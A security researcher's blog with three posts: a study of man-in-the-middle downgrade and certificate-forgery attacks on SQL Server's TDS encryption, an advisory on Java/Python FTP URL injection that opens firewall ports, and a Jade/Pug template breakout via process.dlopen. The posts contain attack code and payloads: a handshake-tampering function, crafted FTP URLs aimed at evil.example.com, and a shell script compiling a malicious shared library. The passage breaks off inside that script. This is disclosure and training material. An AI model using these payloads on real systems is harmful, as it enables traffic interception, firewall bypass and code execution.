Tuesday, December 19, 2017

Advanced SQL Server Man-in-the-Middle Attacks

UPDATE: A few days after publishing this, Microsoft began making updates to the referenced documentation. I haven't reviewed these updated versions for technical accuracy, but it is nice to see some movement from their side.

In an application security assessment I performed alongside the fine folks at Summit Security Group, we encountered an application that was relying heavily on the encryption features of the Tabular Data Stream (TDS) protocol. These protocol features are implemented in Microsoft SQL Server to protect communications over untrusted networks. Out of curiosity, we investigated how different configuration settings on both the server and client change the security properties of this protocol. We quickly realized that our client's communications were insecure. To demonstrate the risk, we developed a man-in-the-middle (MitM) tool which exploited two separate insecure configurations. In sharing with the community, we hope this article will raise awareness about how easy it is to make similar mistakes when implementing TDS encryption.

Background

The Tabular Data Stream (TDS) protocol is used by Microsoft SQL Server as the primary way in which clients interact with the database server. The protocol has been updated many times over the years to support additional features, including the use of TLS-based encryption implemented as an opportunistic mechanism. This opportunistic encryption is implemented in a way that is similar to STARTTLS. An initial unencrypted handshake occurs, and if both sides advertise support for encryption, then a TLS handshake occurs on the same TCP connection, thereafter allowing further communications to continue over this encrypted tunnel. As with any opportunistic encryption, the protocol can be highly vulnerable to downgrade attacks and other man-in-the-middle attacks if clients and servers are not carefully configured. Exacerbating this issue is the fact that much of Microsoft's documentation on the topic is confusing, incorrect, or creates a false sense of security about certain configuration settings.

Attack 1: Certificate Forgery

Anyone using TLS must be mindful of how certificates are validated. The first thing an attacker is likely to try against any TLS implementation is to conduct a man-in-the-middle attack that presents self-signed or otherwise forged certificates to TLS clients (and servers, if client certificates are in use). To its credit, Microsoft's implementation of TDS is safe in the sense that it enables certificate validation by default, which prevents this attack. Developers would need to explicitly disable certificate validation to be vulnerable. With that said, this is fairly common in development environments given that developers often want to avoid the effort of setting up certificates on non-production machines. During security assessments, we want to ensure certificate validation is enabled in the actual production deployment. In this particular engagement, we couldn't find an off-the-shelf tool that made it easy to test for this issue in TDS, so we rolled our own.

Our TDS MitM script can be run in "cert" mode through the "--mitm_type" option. This causes the script to perform a classic certificate man-in-the-middle attack whereby a TLS connection is accepted from the client, but a second one is initiated to the server before the handshake is finished. The script leverages the Bletchley SSL/TLS library to automatically clone the server's advertised certificate, and then presents a fake version to the client.

Attack 2: Asymmetric Downgrade

When TDS clients connect to Microsoft SQL Server, an unencrypted handshake ensues where both parties advertise whether or not they are configured to use encryption. Each side can claim one of the following: encryption is not supported (ENCRYPT_NOT_SUP); encryption is supported, but prefer not to use it (ENCRYPT_OFF); encryption is supported and prefer to use it (ENCRYPT_ON); encryption is required (ENCRYPT_REQ). The first three are useful for backward compatibility, but from a security perspective, requiring encryption is the only secure option. If neither party explicitly requires encryption, then a trivial man-in-the-middle attack is possible whereby the attacker can update the values of both handshake messages to say that encryption is not supported. From there, both the client and server will just assume they can't use encryption and will move forward with an insecure conversation. This classic downgrade attack, as applied to TDS, was discussed in detail by Azhar Desai in 2015. Interestingly enough, the story doesn't end there. What happens if one party requires encryption, but the other doesn't? Is an attack still possible?

As it turns out, yes. In the specific case where the server requires encryption to be used, but the client does not, then an asymmetric downgrade attack is fairly easy to conduct. In the early handshake packets, we know the server will advertise ENCRYPT_REQ, attempting to signal to the client that encryption must be used. Meanwhile the client will advertise some other level of support for encryption (ENCRYPT_ON or ENCRYPT_OFF). During the exploit, our attacker modifies the server's handshake packet and sets it to ENCRYPT_NOT_SUP. This will trigger the client to disable encryption during further transactions. However, the server is still going to expect a TLS handshake to come next. At that point, the attacker impersonates the client and initiates a TLS handshake on their behalf. Since the server doesn't require any TLS client certificate (only server certificates are verified in TDS), the server is none the wiser and continues to communicate with the attacker posing as the client.
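To show how little tampering this step involves, here is a minimal Python sketch of rewriting the encryption setting in a PRELOGIN payload. It assumes the option layout described in Microsoft's MS-TDS specification (a table of entries, each a one-byte token followed by a two-byte big-endian offset and a two-byte big-endian length, ended by 0xFF, with ENCRYPTION as token 0x01) and the numeric values that specification assigns to the four settings. The function name is hypothetical and is not taken from our MitM script, and handling of the 8-byte TDS packet header is left out.

```python
import struct

# Values assumed from the MS-TDS PRELOGIN description.
ENCRYPT_OFF, ENCRYPT_ON, ENCRYPT_NOT_SUP, ENCRYPT_REQ = 0x00, 0x01, 0x02, 0x03
ENCRYPTION_TOKEN = 0x01
TERMINATOR = 0xFF


def rewrite_encryption(payload: bytes, new_value: int) -> bytes:
    """Return a copy of a PRELOGIN payload with its ENCRYPTION byte replaced.

    `payload` is the PRELOGIN data only (TDS packet header already removed).
    """
    buf = bytearray(payload)
    pos = 0
    # Walk the option table until the terminator token.
    while pos < len(buf) and buf[pos] != TERMINATOR:
        if pos + 5 > len(buf):
            raise ValueError("truncated option table")
        token = buf[pos]
        offset, length = struct.unpack_from(">HH", buf, pos + 1)
        if token == ENCRYPTION_TOKEN:
            if length != 1 or offset >= len(buf):
                raise ValueError("malformed ENCRYPTION option")
            buf[offset] = new_value
            return bytes(buf)
        pos += 5  # each table entry is token + offset + length
    raise ValueError("no ENCRYPTION option found")


# Hand-built example payload: VERSION (6 bytes) and ENCRYPTION (1 byte).
example = (
    bytes([0x00]) + struct.pack(">HH", 11, 6)
    + bytes([ENCRYPTION_TOKEN]) + struct.pack(">HH", 17, 1)
    + bytes([TERMINATOR])
    + bytes(6)                    # placeholder VERSION data
    + bytes([ENCRYPT_REQ])        # server says encryption is required
)
tampered = rewrite_encryption(example, ENCRYPT_NOT_SUP)
```

Nothing in the unencrypted handshake authenticates this byte, which is why only the client's own requirement for encryption can defeat the change.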

Next, the attacker simply relays all further communications between the two parties. As messages come from the server over the TLS channel, they are decrypted and forwarded over an unencrypted TDS connection to the client. Likewise, when the client sends messages unencrypted to the attacker's proxy, the attacker just relays those over the TLS link to the server. Included in these forwarded messages is the client's password authentication handshake, which typically exposes the database user's password hash, or perhaps even the plaintext password.

The following diagrams summarize the steps of this attack. In the first diagram, we have an unaltered handshake where a client wants to use encryption (but doesn't require it) and the server does require it:

That communication would be vulnerable to attack, however, since the client doesn't require encryption. The man-in-the-middle attack in that situation would look like the following:

Our TDS MitM script executes this attack when you use "downgrade" through the "--mitm_type" option.

Ok, that's spiffy, but what if a TDS client requires encryption and the server doesn't? Is an attack still possible? I'm not aware of one. It is different in this case, because TLS is authenticated in only one direction. If the client is both requiring encryption to be used and is validating the server's certificate on that connection (assuming certificate validation hasn't been explicitly turned off), then the connection is sound. An attacker could clearly fool the server into using no encryption on one side of the man-in-the-middle proxy, but the client-side conversation won't get very far if the attacker can't fool the client into trusting an invalid server certificate.

As it turns out, only two things actually matter for providing communications security in TDS traffic with TLS: the client must be configured to require encryption and it must be configured to validate the server certificate. All of the server-side settings are just backward-compatibility baggage that add to confusion.
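The cases discussed above can be summarized as a small decision function. This is only a sketch of the reasoning in this article, with hypothetical parameter names, and it reports the first applicable attack rather than every one.

```python
def known_attack(client_requires_encryption: bool,
                 client_validates_cert: bool,
                 server_requires_encryption: bool):
    """Name the attack from this article that applies, or None if none does."""
    if not client_requires_encryption:
        # The client will accept a plaintext session if told encryption is
        # unsupported; the server-side setting only changes the variant.
        if server_requires_encryption:
            return "asymmetric downgrade"
        return "downgrade"
    if not client_validates_cert:
        # TLS is used, but any certificate is accepted.
        return "certificate forgery"
    return None


# The server-side setting never changes whether the client is protected.
for server_setting in (False, True):
    print(server_setting, known_attack(True, True, server_setting))
```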

Misleading Documentation

Throughout this research, we reviewed a great deal of documentation provided by Microsoft, but found that many of the documents create a false sense of security, mislead developers, or in the worst cases, contain incorrect statements about security-critical details. Here we list some of these errata to help set the record straight and encourage Microsoft to address these items to reduce confusion within the MSSQL user population.

In the now out-of-date article How to enable SSL encryption for an instance of SQL Server by using Microsoft Management Console, the following advice appears in a highlighted note: "Do not enable the Force Protocol Encryption option on both the client and the server. To enable Force Protocol Encryption on the server, use the Server Network Utility or SQL Server Configuration Manager, depending on the version of SQL Server. To enable Force Protocol Encryption on the client, use the Client Network Utility or SQL Server Configuration Manager." This is odd, since requiring protocol encryption on the client and server at the same time should work just fine. In addition, we now know that the setting on the server side is irrelevant to security.
In Enable Encrypted Connections to the Database Engine, step-by-step procedures are provided showing how to configure a server to require encryption under the heading “To configure the server to accept encrypted connections”. The "to accept" wording of this heading is confusing, since SQL Server already accepts encrypted connections by default. It just doesn't require them by default. Also, there is absolutely no indication to the reader that this setting provides no additional communications security, whereas the client-side setting described in the same article actually does.
In one of Microsoft's most recent articles, Using Encryption Without Validation, there are almost too many misguided or incorrect statements to enumerate in a blog post like this.

For one, the article's title itself should be a huge red flag to anyone in security. Using TLS without certificate validation clearly defeats the whole purpose of using encryption in the first place. We strongly urge Microsoft to include an explicit warning in this article to highlight this fact.
From the very first sentence of the article, we have a problem: "SQL Server always encrypts network packets associated with logging in." – This fails to mention that the encrypted handshake is based on NTLM authentication, which any seasoned security expert would know has been riddled with cryptographic flaws for decades. Such flaws can allow for relay attacks and offline password cracking, at a minimum. Even worse, there are fairly recent claims that a downgrade attack is possible on the password authentication handshake itself, allowing for full plaintext password retrieval. There is even a Metasploit module designed specifically to conduct these attacks! Finally, even if this password authentication handshake were securely designed, an attacker could just hijack the TCP connection after authentication is completed to gain the same access as the victimized client.
In the next paragraph, we find: "This may also be configured by SQL Server Configuration Manager using the Force Protocol Encryption option." – As mentioned several times before, we know now that the server-side setting provides no security.
Shortly thereafter, we have: "To enable encryption to be used when a certificate has not been provisioned on the server, SQL Server Configuration Manager can be used to set both the Force Protocol Encryption and the Trust Server Certificate options. In this case, encryption will use a self-signed server certificate without validation if no verifiable certificate has been provisioned on the server." – This last sentence is very misleading. If the Trust Server Certificate option is set on the client, then the communications are vulnerable to certificate man-in-the-middle attacks. That's true even if you later deploy a verifiable certificate on the server. This sentence might lead a reader to believe the "fix" is just to deploy a verifiable certificate without also correcting the client-side settings.
The article provides a table with a breakdown of server and client-side settings, describing what would happen in each case. This proves useful for understanding behavior, but it repeatedly reinforces the idea that using some encryption with no certificate validation is somehow OK, or better than using no encryption at all. It isn't. With the right tool, active man-in-the-middle attacks are just as easy to conduct as passive sniffing in the vast majority of networking technologies we use today.

With that said, there are some articles from Microsoft that do a better job of explaining these settings. The Encrypting Connections to SQL Server article includes a clear warning that "SSL connections that are encrypted by using a self-signed certificate do not provide strong security. They are susceptible to man-in-the-middle attacks. You should not rely on SSL using self-signed certificates in a production environment or on servers that are connected to the Internet." This is a great warning and should exist in any article that discusses Trust Server Certificate settings (though I'd like to see a warning about requiring encryption as well).

Finally, the folks at Azure seem to have done their homework. All of the client connection strings they provide to customers as samples seem to include both an explicit TrustServerCertificate=False flag (which just explicitly enables certificate validation), as well as the appropriate flag to require encryption.
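A quick way to review client settings is to check connection strings for these two flags. The sketch below is a rough audit helper with hypothetical names. It assumes the Encrypt and TrustServerCertificate keywords, treats a missing Encrypt as "not required" and a missing TrustServerCertificate as "validation enabled" (the defaults described in this article), and uses a naive split that does not handle quoted values.

```python
TRUTHY = {"true", "yes"}


def parse_connection_string(conn_str: str) -> dict:
    """Naively split 'key=value;key=value' pairs into a lowercase dict."""
    settings = {}
    for part in conn_str.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            settings[key.strip().lower()] = value.strip().lower()
    return settings


def audit(conn_str: str) -> list:
    """Return a list of problems; an empty list means both flags look right."""
    settings = parse_connection_string(conn_str)
    problems = []
    if settings.get("encrypt", "false") not in TRUTHY:
        problems.append("encryption is not required by the client")
    if settings.get("trustservercertificate", "false") in TRUTHY:
        problems.append("server certificate validation is disabled")
    return problems


# Hypothetical server names, for illustration only.
print(audit("Server=tcp:db.example.net,1433;Encrypt=True;TrustServerCertificate=False;"))
print(audit("Server=db.example.net;Encrypt=True;TrustServerCertificate=True"))
```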

Vendor Response

We contacted the Microsoft Security Response Center (MSRC) on November 22, 2017 and sent them a draft version of this blog post along with the MitM script. We asked Microsoft to comment on our findings, offer any corrections, and to indicate whether their documentation would be updated. While the MSRC was responsive to our emails, their SQL Server product team has yet to respond.

Those Who Came Before

The concept of an asymmetric downgrade on SSL/TLS is hardly new. Moxie Marlinspike's sslstrip tool implemented this approach over five years ago. Downgrade attacks on STARTTLS mechanisms are not new either. Sadly, the application of these techniques to proprietary (if documented) protocols tends to be slow. At the time of our testing in early 2016, we weren't aware of any tools that allow for an asymmetric downgrade of TDS, let alone a simple certificate spoofing attack. As we polished up this document, we came across another tool, TDSBridge, which acts as a TDS proxy and includes a brief comment in the documentation: "it even works with server side forced encryption". Of course that should be an ominous sign to security folk and helps confirm our observations. While TDSBridge isn't a security-focused tool, we feel obligated to mention it since the author clearly discovered this fact before we did, even if it wasn't called out as a security risk.

Conclusion

Microsoft SQL Server database traffic is insecure by default, because encryption is not required by client libraries. This is a forgivable default setting, considering the fact that correctly configured server certificates are needed to make communications secure anyway. However, the documentation guiding administrators on how to add communications security is deeply flawed in multiple ways and requires revision. In light of the insecure default settings and the misleading documentation, it is our hunch that the vast majority of Microsoft SQL Server network traffic is vulnerable to man-in-the-middle attacks, even if SQL Server administrators have taken steps to secure it.

Monday, February 20, 2017

Advisory: Java/Python FTP Injections Allow for Firewall Bypass

UPDATE: Fixes for these issues have been out for a while. Therefore I've published a proof-of-concept exploit. Enjoy.

Overview

Recently, a vulnerability in Java's FTP URL handling code has been published which allows for protocol stream injection. It has been shown that this flaw could be used to leverage existing XXE or SSRF vulnerabilities to send unauthorized email from Java applications via the SMTP protocol. While technically interesting, the full impact of this protocol stream injection has not been fully accounted for in existing public analysis.

Protocol injection flaws like this have been an area of research of mine for the past couple of years, and as it turns out, this FTP protocol injection allows one to fool a victim's firewall into allowing TCP connections from the Internet to the vulnerable host's system on any "high" port (1024-65535). A nearly identical vulnerability exists in Python's urllib2 and urllib libraries. In the case of Java, this attack can be carried out against desktop users even if those desktop users do not have the Java browser plugin enabled.

As of 2017-02-20, the vulnerabilities discussed here have not been patched by the associated vendors, despite advance warning and ample time to do so.

The Bugs

Java is vulnerable to FTP protocol stream injection via malicious URLs in multiple contexts. If an attacker can convince any Java application to attempt to retrieve a malicious URL of this type, then the attacker can inject FTP commands into the client's protocol stream. For instance, the following URL:

ftp://foo:bar%0d%0aINJECTED@example.net/file.png

Allows for new lines (CRLF) to be injected in the TCP stream, making the receiving server think that "INJECTED" is a separate command sent by the client. The above URL, when fetched by Java, causes the following partial command sequence to be sent:

USER foo
PASS bar
INJECTED
TYPE I
EPSV ALL
PASV
...

Java is actually vulnerable to injection via multiple fields in the URL. The username field and any directory specified in the URL can also allow for injection.
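The mechanics are easy to reproduce with a toy model. The Python sketch below is not Java's or Python's actual FTP client code. It is a hypothetical, deliberately naive client that percent-decodes the URL's credentials and writes them straight into the control channel, followed by the kind of check a client could apply to refuse such URLs.

```python
from urllib.parse import urlsplit, unquote


def login_lines(url: str) -> list:
    """Model a naive FTP client: decode credentials, then build the commands.

    Returns the lines the server would see, split on CRLF.
    """
    parts = urlsplit(url)
    user = unquote(parts.username or "")
    password = unquote(parts.password or "")
    stream = "USER " + user + "\r\n" + "PASS " + password + "\r\n"
    return [line for line in stream.split("\r\n") if line]


def has_line_break(url: str) -> bool:
    """Defensive check: does any decoded URL component contain CR or LF?"""
    parts = urlsplit(url)
    decoded = unquote(parts.netloc + parts.path)
    return "\r" in decoded or "\n" in decoded


url = "ftp://foo:bar%0d%0aINJECTED@example.net/file.png"
print(login_lines(url))      # the injected text arrives as its own line
print(has_line_break(url))
```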

Python's built-in URL fetching library (urllib2 in Python 2 and urllib in Python 3) is vulnerable to a nearly identical protocol stream injection, but this injection appears to be limited to attacks via directory names specified in the URL.

FTP Security Quirks

To fully understand the attack I am about to describe, it is critical to have a solid grasp of how the FTP protocol works. FTP's primary communications start on a "control channel", which is the TCP connection initiated by clients (typically to port 21) where human-readable commands and responses can be observed. Whenever file contents, directory listings, or other bulk data is transferred, a secondary TCP connection, called the "data channel", is created for this purpose. In the classic protocol specification, the FTP client tells the server how to connect back to it at an IP address and random high port. The FTP server then connects back to the client and sends the requested data over this temporary channel. Once network address translation became popular, this caused problems for FTP, so a "passive mode" was introduced. In this passive mode, data channels are instead initiated by the client. (For the sake of clarity, the original FTP mode of data channel initiation will be hereafter referred to as "classic mode".) Over time, firewall implementations began to support classic mode FTP by performing control channel protocol inspection, and then dynamically routing server-initiated TCP connections back to the appropriate host.

The behavior of classic mode FTP and firewalls has been a source of security risk for a very long time. An attack was identified where a victim could be lured into running a non-privileged Java applet on a web page. This applet would create an FTP control channel back to the attacker's server and fool stateful firewalls into opening arbitrary TCP ports and relaying them back to the victim's desktop system. The first public mention of this apparently comes from Phrack issue #60, published in 2002. A few years later, a clearer write-up of the attack was published by Florian Weimer. Nearly 15 years since then, many commercial firewalls still support classic mode FTP by default.

Tricking Firewalls

Since our FTP control channel injection vulnerabilities allow us to take over the commands sent by FTP clients, it should be possible to pull off the firewall attacks described long ago, right? For instance, we could simply inject a malicious PORT command into the stream at the right moment. When the firewall sees this, it will translate the internal IP address and port for that command into an external address and port, and then enable a temporary NAT rule to allow a single TCP connection to come back in, relaying it to the FTP client.

Suppose for a moment that the victim host has an internal IP address of 10.1.1.1 and our attacker hosts a server at evil.example.com. Then we should expect the following FTP URL to fool the firewall into opening up port 1337:

ftp://u:p@evil.example.com/foodir%0APORT%2010,1,1,1,5,57/z.txt

(Note that in the classic FTP PORT command, the port number is represented as two separate ASCII-encoded octets. In short: 1337 == 5*256 + 57) However, as it turns out there are actually two significant challenges in making this work in practice...
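The port arithmetic can be checked with a few lines of Python. The helper name is hypothetical; it only formats the argument of a PORT command from a dotted IPv4 address and a port number.

```python
def port_argument(ip: str, port: int) -> str:
    """Format an IPv4 address and port as the argument of an FTP PORT command."""
    if not 0 <= port <= 65535:
        raise ValueError("port out of range")
    high, low = divmod(port, 256)  # port == high * 256 + low
    return ",".join(ip.split(".") + [str(high), str(low)])


print("PORT " + port_argument("10.1.1.1", 1337))
```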

First Challenge: Determining Internal IP

Of course to pull this off, the attacker needs to know the victim's internal IP address (or else the stateful firewall will ignore the PORT command). Let's assume the attacker gets multiple bites at the cherry. That is, they can send a URL, see how the client behaves, then try another until the attack is successful. (Only 2-3 attempts should be required, as you'll see by the end of this.)

As a first probe, the attacker can simply supply the victim with an FTP URL that points to an unusual port on the attacker's server, such as:

ftp://u:p@evil.example.com:31337/foodir/z.txt

Note that there are no protocol stream injection attempts happening here. FTP clients will attempt to initiate a passive session to retrieve the z.txt file, but if the attacker's FTP server rejects the PASV command, then the client will fall back to classic mode and send a PORT command. Since the port used for the control channel is non-standard, it is unlikely that a stateful firewall at the victim's site will attempt to interpret and translate the PORT commands on this session. That will cause the internal IP address of the victim to be leaked to the attacker.
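On the attacker's server, recovering the leaked address is just a matter of parsing the PORT line the client sends. A minimal sketch, with a hypothetical function name and a made-up example line:

```python
def parse_port_command(line: str):
    """Extract (ip, port) from a classic-mode FTP PORT command line."""
    verb, _, argument = line.strip().partition(" ")
    if verb.upper() != "PORT":
        raise ValueError("not a PORT command")
    fields = [int(field) for field in argument.split(",")]
    if len(fields) != 6 or any(not 0 <= field <= 255 for field in fields):
        raise ValueError("malformed PORT argument")
    ip = ".".join(str(field) for field in fields[:4])
    port = fields[4] * 256 + fields[5]
    return ip, port


# Example line as an untranslated client might send it.
print(parse_port_command("PORT 10,1,1,1,200,21\r\n"))
```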

Second Challenge: Packet Alignment

Everything up until now seems very easy. However, if you stop reading now, you won't know the key ingredient to this recipe.

FTP is designed as a synchronous, line-based protocol where each side of the communication writes one line and waits for a response from the other side before continuing. That means neither side of the communication should write more than one command before waiting for the other to respond.

The Linux conntrack developers take advantage of this fact to try and be extra sure that they really are seeing a PORT command on the wire. The implementation requires any PORT command to appear at the very beginning of a packet. Therefore, the following URL (as shown earlier) doesn't actually cause Linux firewalls to open up the desired port:

ftp://u:p@evil.example.com/foodir%0APORT%2010,1,1,1,5,57/z.txt

If you carefully observe the packet trace of this URL being fetched, you'd see commands sent by the client coming in the following individual packets:

--Packet 1--
USER u
--Packet 2--
PASS p
--Packet 3--
TYPE I
--Packet 4--
CWD foodir
PORT 10,1,1,1,5,57
--Packet 5--
...

Since the PORT command comes in the middle of Packet 4, Linux ignores it.

The secret ingredient is that we need to find a way to force the client to send the PORT command at the very beginning of a packet, even though two commands were sent in a single write(2) call by Java or Python. Of course, it is possible for a user-space application to perform a write(2) call to a socket with data that is much larger than the packet size supported by the TCP connection. What if our CWD command had a directory name that was just long enough such that it filled up exactly one TCP packet? Then "PORT..." would be forced to start at the beginning of the very next packet!

This can be tricky to pull off, since MTU sizes can be relatively large (and a Java/Python application might complain about receiving a very long URL during the attack). Also, network conditions between any pair of hosts will vary, making it hard to predict the effective MTU sizes up front. To simplify things, we can force the FTP control channel's TCP connection to use the minimum MTU size, since we control the malicious FTP server. On the attacker's side, firewall rules can be used to clamp the MSS to 536 bytes, which makes our malicious URLs much easier to calculate. From there, some basic trial and error can be used to determine what length the directory name must be to exactly align with a packet boundary.
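The alignment arithmetic can be modeled offline. The Python sketch below uses hypothetical helper names and makes two simplifying assumptions: the client writes the CWD and injected PORT lines in one call, and the TCP stack cuts that write into segments carrying exactly the given number of payload bytes. On a real connection, TCP options can leave less room than the clamped MSS, which is why trial and error is still needed.

```python
def padded_directory(segment_payload: int, prefix: bytes = b"CWD ",
                     separator: bytes = b"\n", fill: bytes = b"A") -> bytes:
    """Directory name that makes prefix + name + separator fill one segment."""
    pad_len = segment_payload - len(prefix) - len(separator)
    if pad_len < 1:
        raise ValueError("segment too small for any directory name")
    return fill * pad_len


def split_into_segments(data: bytes, segment_payload: int) -> list:
    """Model the stack cutting one large write into full-size segments."""
    return [data[i:i + segment_payload]
            for i in range(0, len(data), segment_payload)]


payload_size = 536  # assumed usable bytes per segment
directory = padded_directory(payload_size)
stream = b"CWD " + directory + b"\nPORT 10,1,1,1,5,57\r\n"
segments = split_into_segments(stream, payload_size)
print(len(directory), segments[1])
```

If the real payload size turns out to be smaller, the same calculation applies with the smaller value.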

Why are we so interested in fooling the Linux conntrack module? As it turns out, many commercial firewall implementations use Linux as their base firewall. More on that below. Other firewalls may use similar checks to mitigate FTP shenanigans, but we have not yet researched this.

Proof of Concept

An exploit for the attack described here has been developed. The script starts up by providing the attacker a URL to test against the victim, and then initiates a malicious FTP server. Upon receiving the first request, the FTP server interactively calculates a new URL containing a directory name length which causes the PORT command to land at the beginning of a packet. The entire attack (including the request used to determine the victim's internal IP) is typically accomplished with just three SSRF attacks to open up one TCP port. Each additional SSRF attack could open up one additional TCP port. Since most firewalls do not allow FTP data channels to be set up by clients on ports below 1024, the ports an attacker can target are limited to the 1024-65535 range.

The exploit script will not be released until both Oracle and Python developers correct their FTP client code.

Attack Scenarios

There are a variety of situations where we could convince a Java application to fetch our URLs, which we discuss briefly here.

JNLP Files

This is perhaps the most startling attack scenario. If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP file. These files could contain malicious FTP URLs which trigger this bug. A clever attacker could weaponize the exploit to identify the victim's internal IP address, determine the appropriate packet alignment, and then exploit the bug all in one shot. A clever implementation could even open many ports at once using a single JNLP file. Also note that, since Java parses JNLP files before presenting the user with any security warnings, the attack can be fully successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched).

Man-in-the-Middle

If a Java or Python (urllib) application is fetching any HTTP URL, then a privileged network attacker could inject an HTTP redirect to bootstrap this attack.

Server-Side Request Forgery (SSRF)

If an application accepts any HTTP, HTTPS, or FTP URL, then exploitation is straightforward. Even if the application accepts only HTTPS or HTTP URLs due to (naive) input validation, an attacker could simply redirect the client to a malicious FTP URL.

XML eXternal Entities (XXE)

Most XXE bugs yield SSRF-like access, so this is pretty straightforward. Note that some XXE vulnerabilities aren't very practical to exploit because XML parser settings prevent classic entity attacks. However, in some of these cases SSRF is still possible through DOCTYPE headers. If external entities are supported by an XML parser, then several URLs could be included in a single document, allowing for IP address determination, packet alignment determination, and finally an exploit (using dynamic redirection) all in one XXE attack.

Firewall Testing

Most FTP translation testing was performed against a custom Linux firewall running a recent kernel. Many commercial firewalls use Linux as a base operating system for their appliances. In many cases, these vendors enable classic mode FTP by default. Limited testing was performed against a Palo Alto firewall and a Cisco ASA firewall, both of which appeared to be vulnerable under default settings. While testing of commercial firewalls has been very limited at this point, it seems likely that a significant percentage of production firewalls in the world are susceptible to attack through FTP protocol stream injections.

Responsible Disclosure

The Python security team was notified in January 2016. Information provided included an outline of the possibility of FTP/firewall attacks. Despite repeated follow-ups, there has been no apparent action on their part.

Oracle was notified in early November 2016 with full details of the attack. No patch for Java is currently available.

Prior Research

The recent disclosure of SMTP attacks using FTP protocol injection was the impetus for releasing these details now. However, previous researchers had already published information showing the protocol stream injection existed. Between these two publications and knowledge of the Java/Firewall Attack, it is not a leap to realize FTP shenanigans might be possible as well.

Recommendations for Vendors

Commercial Firewall Vendors

Disable classic mode FTP by default. Add prominent warnings to configuration interfaces that enabling it carries unnecessary risk. (Even after these protocol injections are fixed, other injections have been known to appear which could be used to exploit this condition.)

Linux netfilter Team

Consider adding prominent warnings to the documentation for conntrack that discuss the risk of enabling FTP translation (and perhaps other translation). Perhaps this will help discourage future commercial device vendors from making the same mistakes of the past.

Other Software/Service Vendors

Audit your applications to be sure they are not vulnerable to SSRF or XXE attacks. XML parsing in Java is currently vulnerable by default, making XXE vulnerabilities very common on that platform.

Recommendations for the General Public

Consider uninstalling Java from all desktop systems. If this is not possible due to legacy application requirements, disable the Java browser plugin from all browsers and disassociate the .jnlp file extension from the Java Web Start binary.
Consider requesting an update to fix these issues from Oracle and the Python Software Foundation. Be sure to apply security updates to all versions of Java and Python, including those running on application servers and appliances.
Disable classic mode FTP in all firewalls, allowing only passive mode.

Sunday, September 4, 2016

Node.js: Breaking Out of Jade/Pug with process.dlopen()

UPDATE #1: The Jade/Pug developers emphasized to me that they never intended there to be any kind of "sandbox" or other controls limiting arbitrary code execution once you are within a template context. The difficulty of breaking out of the limited namespace is simply an unintentional technical artifact.

UPDATE #2: James Kettle had pointed out a far simpler Jade breakout a full year before I published this. I wish I had seen that before embarking on my research... =/

Not long ago I was asked by a client to provide a short training on writing secure Node.js applications. As part of the class, I decided to build an intentionally-vulnerable Express application (under Node 4.x) that allowed insecure file uploads. In one scenario I created, the application was susceptible to a directory traversal vulnerability, allowing students to upload arbitrary Jade/Pug templates that the application would later execute. I'm not sure if this is a very common condition in Express applications, but it is plausible that it could show up in real-world apps.

Pug does allow server-side JavaScript execution from within templates, so when I was initially building this vulnerable application I assumed students would be able to immediately set up whatever backdoor they chose from within their malicious templates. However, I quickly realized I was mistaken! In fact, Pug sets up only a very limited scope/namespace for code to execute within. Most Node.js global variables are not available, and require() isn't available, making it very hard to get access to fun things like child_process.exec(). The Jade developers have set themselves up a makeshift sandbox for this template code, which is great to see.

Of course for someone like me, a sandbox doesn't look so much like a road block as it looks like a fun challenge. ;-) Clearly if a developer were to explicitly expose local variables to Pug when evaluating a template, and those local variables had dangerous methods or otherwise exposed important functionality, then an attacker might be able to leverage that application-specific capability from within Pug to escalate privileges. However, that's speculative at best and will vary from one app to the next, so it would be more interesting if there was a general purpose way to break out of Pug.

As basic reconnaissance, I began to enumerate the few global variables that are exposed in Pug. I started with a simple template and tested it from the command line:

$ echo '- for (var prop in global) { console.log(prop); }' > enumerate.jade
$ jade enumerate.jade

global
process
GLOBAL
root
Buffer
clearImmediate
clearInterval
clearTimeout
setImmediate
setInterval
setTimeout
console
  rendered enumerate.html

Next, I began just printing out one object at a time to see a listing of methods and such, but it seemed like some pretty slim pickings. I'll spare you the excitement of how many methods and APIs I read about over the next hour or so. Yet even a blind dog finds a bone now and then, and finally I stumbled across an interesting method in the process object:

...
  _debugProcess: [Function: _debugProcess],
  _debugPause: [Function: _debugPause],
  _debugEnd: [Function: _debugEnd],
  hrtime: [Function: hrtime],
  dlopen: [Function: dlopen],
  uptime: [Function: uptime],
  memoryUsage: [Function: memoryUsage],
  binding: [Function: binding],
...

That scratched a part of my brain that is firmly outside of Node.js land. Of course! This is a wrapper to dlopen(3). Shared libraries (e.g. .so files, or .dll files on lesser operating systems) are code, and that is going to pique any hacker's interest. This method does not appear in the Node.js documentation, but it is definitely discussed around the webbernet in the context of Node.js, if you look for it. As it turns out, the Node.js wrapper to dlopen expects shared libraries to be proper Node-formatted modules. These are just regular shared libraries with certain additional symbols defined, and to be honest, I haven't absorbed every detail with respect to what these modules look like. But suffice it to say, you can't just load up the libc shared library and call system(3) to get your jollies, since Node's dlopen will blow up once it realizes libc.so isn't a proper Node module.

Of course we could use dlopen to load up any native Node module that is already installed as a dependency to the application. An attacker may need to know the full path to the pre-installed module, but one could guess that with a bit of knowledge of the standard install directories. That would afford an attacker access to any functionality provided by the module from within Pug, which could provide a stepping stone to arbitrary code execution. But once again, that's going to be installation/application-specific and isn't nearly as fun as a general purpose escalation.

Recall, however, that my intentionally vulnerable Express application allows file uploads! That's how I'm giving my students access to run Pug templates in the first place. So in this scenario, the attacker can just upload their own Node module as a separate file, containing whatever functionality they choose, and invoke it to gain access to that functionality within Pug code. The obvious way to do this would be to set up a proper Node build chain that creates a natively-compiled module. That seemed like a lot of work to me, so I came up with a short-cut. In order to load a module, Node needs to first call libc's dlopen. This function doesn't have nearly the pesky requirements that Node's module system does. What's more, libc (and Windows, for that matter) has the option to execute arbitrary code during the module load process. So before libc's dlopen even returns (and allows Node to verify the module exports), we can execute any code we like. So this is how I compiled my proof-of-concept payload using a simple shell script:

#!/bin/sh

NAME=evil

echo "INFO: Temporarily writing a C source file to /tmp/${NAME}.c"
cat > /tmp/${NAME}.c <<END
#include <stdio.h>
#include <stdlib.h>

/* GCC-ism designating the onload function to execute when the library is loaded */
static void onload() __attribute__((constructor));

/* Should see evidence of successful execution on stdout and in /tmp. */
void onload()
{
    printf("EVIL LIBRARY LOADED\n");
    system("touch /tmp/hacked-by-evil-so");
}
END

